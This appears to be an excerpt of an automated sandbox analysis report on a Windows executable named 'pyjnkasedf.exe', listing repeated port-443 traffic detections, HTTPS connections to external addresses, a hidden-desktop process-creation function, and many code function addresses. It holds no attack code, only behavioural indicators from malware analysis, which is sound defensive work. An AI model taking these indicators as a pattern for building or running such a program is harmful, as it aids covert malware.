            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 62239 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
            Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62232 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62243 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62205
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62207
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62208
            Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62209
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62201
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62204
            Source: unknownNetwork traffic detected: HTTP traffic on port 62244 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62217
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62219
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62211
            Source: unknownNetwork traffic detected: HTTP traffic on port 62209 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62213
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
            Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknownNetwork traffic detected: HTTP traffic on port 62192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
            Source: unknownNetwork traffic detected: HTTP traffic on port 62210 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62227
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62229
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62220
            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62221
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62223
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62224
            Source: unknownNetwork traffic detected: HTTP traffic on port 62221 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62225
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62226
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62207 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62219 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62193 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62253 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62220 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62231 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62246 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
            Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
            Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
            Source: unknownNetwork traffic detected: HTTP traffic on port 62190 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
            Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
            Source: unknownNetwork traffic detected: HTTP traffic on port 62212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
            Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62223 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
            Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62201 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62224 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62192
            Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62193
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62195
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62196
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.10:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 94.130.210.71:443 -> 192.168.2.10:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.10:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.10:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.10:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.10:49782 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 173.222.162.55:443 -> 192.168.2.10:49784 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.190.147.7:443 -> 192.168.2.10:49814 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.10:49974 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.10:62201 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.10:62225 version: TLS 1.2
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041FEA7 CreateDesktopA,memset,memset,CreateProcessA,0_2_0041FEA7

            System Summary

            barindex
            Source: pyjnkasedf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043C8E60_2_0043C8E6
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040C0710_2_0040C071
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040D0010_2_0040D001
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004070010_2_00407001
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004090010_2_00409001
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043C0010_2_0043C001
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040A0110_2_0040A011
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043D0110_2_0043D011
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004040310_2_00404031
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004260310_2_00426031
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004060F10_2_004060F1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004070F10_2_004070F1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040A0F10_2_0040A0F1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043C0F10_2_0043C0F1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043D0F10_2_0043D0F1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0042A0F10_2_0042A0F1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004050810_2_00405081
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004080910_2_00408091
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041E0A10_2_0041E0A1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004081510_2_00408151
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004091710_2_00409171
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040F1110_2_0040F111
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040C1110_2_0040C111
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004041110_2_00404111
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004281C10_2_004281C1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004061D10_2_004061D1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041D1E10_2_0041D1E1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004081F10_2_004081F1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041E1810_2_0041E181
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040A1910_2_0040A191
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043C1910_2_0043C191
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004041B10_2_004041B1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040C2410_2_0040C241
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004092410_2_00409241
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0044025F0_2_0044025F
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004042610_2_00404261
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004062710_2_00406271
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004072110_2_00407211
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043B21F0_2_0043B21F
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043C2210_2_0043C221
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043C2C10_2_0043C2C1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043B2F10_2_0043B2F1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004052810_2_00405281
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040A2810_2_0040A281
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041E2910_2_0041E291
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004072A10_2_004072A1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004202B10_2_004202B1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004073410_2_00407341
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040A3510_2_0040A351
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041E3710_2_0041E371
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043A3710_2_0043A371
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004093010_2_00409301
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040C3110_2_0040C311
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004253200_2_00425320
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004283C10_2_004283C1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004093D10_2_004093D1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004073E10_2_004073E1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043B3E10_2_0043B3E1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004043810_2_00404381
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004083810_2_00408381
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040D3B10_2_0040D3B1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004054610_2_00405461
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004064610_2_00406461
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040A4610_2_0040A461
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040D4710_2_0040D471
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043A4710_2_0043A471
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040C4010_2_0040C401
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040F4010_2_0040F401
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004084310_2_00408431
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004044D10_2_004044D1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004064F10_2_004064F1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040C4A10_2_0040C4A1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004094A10_2_004094A1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043B4B10_2_0043B4B1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043C4B10_2_0043C4B1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040A5510_2_0040A551
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043C5510_2_0043C551
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043A5610_2_0043A561
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004085010_2_00408501
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004075010_2_00407501
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004285010_2_00428501
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040D5210_2_0040D521
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040D5C10_2_0040D5C1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004055C10_2_004055C1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040E5C10_2_0040E5C1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004085D10_2_004085D1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043C5F10_2_0043C5F1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040B5910_2_0040B591
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004095910_2_00409591
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004045910_2_00404591
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004096410_2_00409641
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004076110_2_00407611
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004066210_2_00406621
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004056D10_2_004056D1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040C6E10_2_0040C6E1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004046E10_2_004046E1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040D6810_2_0040D681
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043C6810_2_0043C681
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040B6A10_2_0040B6A1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040A7410_2_0040A741
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040B7410_2_0040B741
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004067610_2_00406761
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004057710_2_00405771
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004097110_2_00409711
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004077110_2_00407711
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004087310_2_00408731
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004397D10_2_004397D1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004087E10_2_004087E1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004097E10_2_004097E1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040A7E10_2_0040A7E1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040B7F10_2_0040B7F1
